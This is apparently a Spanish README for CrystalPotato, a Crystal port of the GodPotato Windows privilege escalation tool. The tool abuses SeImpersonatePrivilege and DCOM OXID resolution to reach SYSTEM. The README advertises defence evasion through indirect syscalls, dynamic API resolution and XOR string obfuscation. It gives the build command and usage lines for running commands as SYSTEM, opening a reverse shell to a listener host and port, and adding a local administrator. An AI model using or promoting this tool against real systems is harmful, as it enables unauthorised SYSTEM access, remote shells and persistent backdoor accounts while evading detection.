
Port en Crystal de GodPotato para abusar de SeImpersonatePrivilege con syscalls indirectas, resolución dinámica de API y ofuscación de cadenas en tiempo de compilación. Ejecuta comandos, shells inversas o agrega usuarios.
Puerto en Crystal de GodPotato, una escalada de privilegios local desde cuentas con SeImpersonatePrivilege a SYSTEM. Funciona abusando del Resolver OXID de DCOM y de la suplantación de canalizaciones con nombre.
Las APIs de Windows se resuelven dinámicamente y se invocan mediante stubs de syscall indirectos, todas las cadenas están ofuscadas con XOR en tiempo de compilación y, por defecto, solo se imprime la salida del comando. Probado en Windows 10, 11 y Server 2025.
CrystalPotato se compila en un único archivo sin dependencias utilizando Crystal en Windows:
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static
Ejecutar un comando, iniciar una reverse shell o crear un administrador local.
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

GodPotato - Implementación original en C# por BeichenDream.
RustPotato - Implementación en Rust por safedv.
SigmaPotato - Implementación en C# con funcionalidades adicionales por tylerdotrar.
| Flag | Descripción |
|---|
-c CMD | Comando a ejecutar como SYSTEM o shell para la reverse shell (predeterminado: cmd.exe) |
-H HOST | Host del listener de la reverse shell |
-P PORT | Puerto del listener de la reverse shell |
-u USER | Crear administrador local - Nombre de usuario |
-pw PASS | Crear administrador local - Contraseña |
-p NAME | Nombre personalizado de la canalización (predeterminado: Crystal) |
-d | Salida de depuración |
-dd | Traza completa |
-h | Mostrar ayuda |